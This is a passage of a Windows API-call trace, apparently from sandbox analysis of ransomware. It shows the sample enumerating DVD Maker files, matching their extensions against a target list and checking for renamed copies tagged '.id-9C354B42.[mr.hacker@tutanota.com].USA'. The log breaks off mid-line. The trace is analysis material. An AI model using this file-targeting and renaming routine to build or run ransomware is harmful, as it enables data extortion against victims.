[0050.045] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0050.045] lstrlenW (lpString=".bz2") returned 4 [0050.045] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0050.045] lstrlenW (lpString=".7z") returned 3 [0050.045] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0050.045] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 84 [0050.045] lstrlenW (lpString=".dbf") returned 4 [0050.045] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0050.046] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 84 [0050.046] lstrlenW (lpString=".1cd") returned 4 [0050.046] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0050.046] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 84 [0050.046] lstrlenW (lpString=".jpg") returned 4 [0050.046] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0050.046] lstrcmpiW (lpString1=".png", lpString2=".USA") returned -1 [0050.046] lstrlenW (lpString="4to3Squareframe_SelectionSubpicture.png") returned 39 [0050.046] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_selectionsubpicture.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0050.046] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=3304) returned 1 [0050.046] CloseHandle (hObject=0x210) returned 1 [0050.046] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_selectionsubpicture.png")) returned 0x20 [0050.046] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_selectionsubpicture.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0050.046] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0050.047] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png") returned 83 [0050.047] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png") returned 83 [0050.047] lstrlenW (lpString=".doc") returned 4 [0050.047] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0050.047] lstrlenW (lpString=".docx") returned 5 [0050.047] lstrcmpiW (lpString1=".docx", lpString2="e.png") returned -1 [0050.047] lstrlenW (lpString=".pdf") returned 4 [0050.047] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0050.047] lstrlenW (lpString=".xls") returned 4 [0050.047] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0050.047] lstrlenW (lpString=".xlsx") returned 5 [0050.047] lstrcmpiW (lpString1=".xlsx", lpString2="e.png") returned -1 [0050.047] lstrlenW (lpString=".ppt") returned 4 [0050.047] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0050.047] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png") returned 83 [0050.047] lstrlenW (lpString=".zip") returned 4 [0050.047] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0050.047] lstrlenW (lpString=".rar") returned 4 [0050.047] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0050.047] lstrlenW (lpString=".bz2") returned 4 [0050.047] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0050.047] lstrlenW (lpString=".7z") returned 3 [0050.047] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0050.047] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png") returned 83 [0050.047] lstrlenW (lpString=".dbf") returned 4 [0050.047] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0050.047] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png") returned 83 [0050.047] lstrlenW (lpString=".1cd") returned 4 [0050.047] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0050.047] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png") returned 83 [0050.047] lstrlenW (lpString=".jpg") returned 4 [0050.047] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0050.047] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png") returned 83 [0050.047] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png") returned 83 [0050.047] lstrlenW (lpString=".doc") returned 4 [0050.048] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0050.048] lstrlenW (lpString=".docx") returned 5 [0050.048] lstrcmpiW (lpString1=".docx", lpString2="e.png") returned -1 [0050.048] lstrlenW (lpString=".pdf") returned 4 [0050.048] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0050.048] lstrlenW (lpString=".xls") returned 4 [0050.048] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0050.048] lstrlenW (lpString=".xlsx") returned 5 [0050.048] lstrcmpiW (lpString1=".xlsx", lpString2="e.png") returned -1 [0050.048] lstrlenW (lpString=".ppt") returned 4 [0050.048] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0050.048] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png") returned 83 [0050.048] lstrlenW (lpString=".zip") returned 4 [0050.048] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0050.048] lstrlenW (lpString=".rar") returned 4 [0050.048] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0050.048] lstrlenW (lpString=".bz2") returned 4 [0050.048] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0050.048] lstrlenW (lpString=".7z") returned 3 [0050.048] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0050.048] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png") returned 83 [0050.048] lstrlenW (lpString=".dbf") returned 4 [0050.048] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0050.048] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png") returned 83 [0050.048] lstrlenW (lpString=".1cd") returned 4 [0050.048] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0050.048] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png") returned 83 [0050.048] lstrlenW (lpString=".jpg") returned 4 [0050.048] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0050.048] lstrcmpiW (lpString1=".png", lpString2=".USA") returned -1 [0050.048] lstrlenW (lpString="4to3Squareframe_VideoInset.png") returned 30 [0050.049] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_videoinset.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0050.049] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=3467) returned 1 [0050.049] CloseHandle (hObject=0x210) returned 1 [0050.049] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_videoinset.png")) returned 0x20 [0050.049] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_videoinset.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0050.049] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_videoinset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0050.049] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png") returned 74 [0050.049] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png") returned 74 [0050.049] lstrlenW (lpString=".doc") returned 4 [0050.049] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0050.049] lstrlenW (lpString=".docx") returned 5 [0050.049] lstrcmpiW (lpString1=".docx", lpString2="t.png") returned -1 [0050.049] lstrlenW (lpString=".pdf") returned 4 [0050.049] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0050.049] lstrlenW (lpString=".xls") returned 4 [0050.049] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0050.049] lstrlenW (lpString=".xlsx") returned 5 [0050.049] lstrcmpiW (lpString1=".xlsx", lpString2="t.png") returned -1 [0050.049] lstrlenW (lpString=".ppt") returned 4 [0050.049] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0050.049] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png") returned 74 [0050.050] lstrlenW (lpString=".zip") returned 4 [0050.050] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0050.050] lstrlenW (lpString=".rar") returned 4 [0050.050] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0050.050] lstrlenW (lpString=".bz2") returned 4 [0050.050] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0050.050] lstrlenW (lpString=".7z") returned 3 [0050.050] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0050.050] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png") returned 74 [0050.050] lstrlenW (lpString=".dbf") returned 4 [0050.050] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0050.050] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png") returned 74 [0050.050] lstrlenW (lpString=".1cd") returned 4 [0050.050] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0050.050] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png") returned 74 [0050.050] lstrlenW (lpString=".jpg") returned 4 [0050.050] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0050.050] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png") returned 74 [0050.050] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png") returned 74 [0050.050] lstrlenW (lpString=".doc") returned 4 [0050.050] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0050.050] lstrlenW (lpString=".docx") returned 5 [0050.050] lstrcmpiW (lpString1=".docx", lpString2="t.png") returned -1 [0050.050] lstrlenW (lpString=".pdf") returned 4 [0050.050] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0050.050] lstrlenW (lpString=".xls") returned 4 [0050.050] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0050.050] lstrlenW (lpString=".xlsx") returned 5 [0050.050] lstrcmpiW (lpString1=".xlsx", lpString2="t.png") returned -1 [0050.050] lstrlenW (lpString=".ppt") returned 4 [0050.050] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0050.050] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png") returned 74 [0050.050] lstrlenW (lpString=".zip") returned 4 [0050.050] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0050.051] lstrlenW (lpString=".rar") returned 4 [0050.051] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0050.051] lstrlenW (lpString=".bz2") returned 4 [0050.051] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0050.051] lstrlenW (lpString=".7z") returned 3 [0050.051] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0050.051] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png") returned 74 [0050.051] lstrlenW (lpString=".dbf") returned 4 [0050.051] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0050.051] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png") returned 74 [0050.051] lstrlenW (lpString=".1cd") returned 4 [0050.051] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0050.051] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png") returned 74 [0050.051] lstrlenW (lpString=".jpg") returned 4 [0050.051] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0050.051] lstrcmpiW (lpString1=".png", lpString2=".USA") returned -1 [0050.051] lstrlenW (lpString="babyblue.png") returned 12 [0050.051] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyblue.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0050.053] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=12349) returned 1 [0050.053] CloseHandle (hObject=0x210) returned 1 [0050.054] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyblue.png")) returned 0x20 [0050.054] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyblue.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0050.054] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyblue.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0050.054] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png") returned 64 [0050.054] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png") returned 64 [0050.054] lstrlenW (lpString=".doc") returned 4 [0050.054] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0050.054] lstrlenW (lpString=".docx") returned 5 [0050.054] lstrcmpiW (lpString1=".docx", lpString2="e.png") returned -1 [0050.054] lstrlenW (lpString=".pdf") returned 4 [0050.054] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0050.054] lstrlenW (lpString=".xls") returned 4 [0050.054] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0050.054] lstrlenW (lpString=".xlsx") returned 5 [0050.054] lstrcmpiW (lpString1=".xlsx", lpString2="e.png") returned -1 [0050.054] lstrlenW (lpString=".ppt") returned 4 [0050.054] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0050.054] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png") returned 64 [0050.054] lstrlenW (lpString=".zip") returned 4 [0050.054] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0050.054] lstrlenW (lpString=".rar") returned 4 [0050.054] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0050.054] lstrlenW (lpString=".bz2") returned 4 [0050.054] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0050.054] lstrlenW (lpString=".7z") returned 3 [0050.054] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0050.054] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png") returned 64 [0050.054] lstrlenW (lpString=".dbf") returned 4 [0050.054] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0050.054] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png") returned 64 [0050.055] lstrlenW (lpString=".1cd") returned 4 [0050.055] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0050.055] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png") returned 64 [0050.055] lstrlenW (lpString=".jpg") returned 4 [0050.055] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0050.055] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png") returned 64 [0050.055] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png") returned 64 [0050.055] lstrlenW (lpString=".doc") returned 4 [0050.055] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0050.055] lstrlenW (lpString=".docx") returned 5 [0050.055] lstrcmpiW (lpString1=".docx", lpString2="e.png") returned -1 [0050.055] lstrlenW (lpString=".pdf") returned 4 [0050.055] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0050.055] lstrlenW (lpString=".xls") returned 4 [0050.055] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0050.055] lstrlenW (lpString=".xlsx") returned 5 [0050.055] lstrcmpiW (lpString1=".xlsx", lpString2="e.png") returned -1 [0050.055] lstrlenW (lpString=".ppt") returned 4 [0050.055] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0050.055] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png") returned 64 [0050.055] lstrlenW (lpString=".zip") returned 4 [0050.055] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0050.055] lstrlenW (lpString=".rar") returned 4 [0050.055] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0050.055] lstrlenW (lpString=".bz2") returned 4 [0050.055] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0050.055] lstrlenW (lpString=".7z") returned 3 [0050.055] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0050.055] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png") returned 64 [0050.055] lstrlenW (lpString=".dbf") returned 4 [0050.055] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0050.055] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png") returned 64 [0050.055] lstrlenW (lpString=".1cd") returned 4 [0050.055] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0050.055] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png") returned 64 [0050.056] lstrlenW (lpString=".jpg") returned 4 [0050.056] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0050.056] lstrcmpiW (lpString1=".wmv", lpString2=".USA") returned 1 [0050.056] lstrlenW (lpString="BabyBoyMainBackground.wmv") returned 25 [0050.056] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymainbackground.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0050.056] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=341322) returned 1 [0050.056] CloseHandle (hObject=0x210) returned 1 [0050.057] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymainbackground.wmv")) returned 0x20 [0050.057] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymainbackground.wmv.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0050.057] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymainbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0050.057] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv") returned 77 [0050.057] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv") returned 77 [0050.057] lstrlenW (lpString=".doc") returned 4 [0050.057] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0050.057] lstrlenW (lpString=".docx") returned 5 [0050.057] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1 [0050.057] lstrlenW (lpString=".pdf") returned 4 [0050.057] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0050.057] lstrlenW (lpString=".xls") returned 4 [0050.057] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0050.057] lstrlenW (lpString=".xlsx") returned 5 [0050.057] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1 [0050.057] lstrlenW (lpString=".ppt") returned 4 [0050.057] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0050.057] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv") returned 77 [0050.057] lstrlenW (lpString=".zip") returned 4 [0050.057] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0050.057] lstrlenW (lpString=".rar") returned 4 [0050.057] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0050.057] lstrlenW (lpString=".bz2") returned 4 [0050.057] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0050.057] lstrlenW (lpString=".7z") returned 3 [0050.057] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0050.057] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv") returned 77 [0050.057] lstrlenW (lpString=".dbf") returned 4 [0050.057] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0050.057] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv") returned 77 [0050.058] lstrlenW (lpString=".1cd") returned 4 [0050.058] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0050.058] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv") returned 77 [0050.058] lstrlenW (lpString=".jpg") returned 4 [0050.058] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0050.058] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv") returned 77 [0050.058] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv") returned 77 [0050.058] lstrlenW (lpString=".doc") returned 4 [0050.058] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0050.058] lstrlenW (lpString=".docx") returned 5 [0050.058] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1 [0050.058] lstrlenW (lpString=".pdf") returned 4 [0050.058] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0050.058] lstrlenW (lpString=".xls") returned 4 [0050.058] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0050.058] lstrlenW (lpString=".xlsx") returned 5 [0050.058] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1 [0050.058] lstrlenW (lpString=".ppt") returned 4 [0050.058] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0050.058] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv") returned 77 [0050.058] lstrlenW (lpString=".zip") returned 4 [0050.058] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0050.058] lstrlenW (lpString=".rar") returned 4 [0050.058] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0050.058] lstrlenW (lpString=".bz2") returned 4 [0050.058] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0050.058] lstrlenW (lpString=".7z") returned 3 [0050.058] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0050.058] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv") returned 77 [0050.058] lstrlenW (lpString=".dbf") returned 4 [0050.058] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0050.058] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv") returned 77 [0050.058] lstrlenW (lpString=".1cd") returned 4 [0050.058] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0050.058] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv") returned 77 [0050.059] lstrlenW (lpString=".jpg") returned 4 [0050.059] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0050.059] lstrcmpiW (lpString1=".wmv", lpString2=".USA") returned 1 [0050.059] lstrlenW (lpString="BabyBoyMainBackground_PAL.wmv") returned 29 [0050.059] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymainbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0050.059] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=325322) returned 1 [0050.059] CloseHandle (hObject=0x210) returned 1 [0050.059] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymainbackground_pal.wmv")) returned 0x20 [0050.059] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD 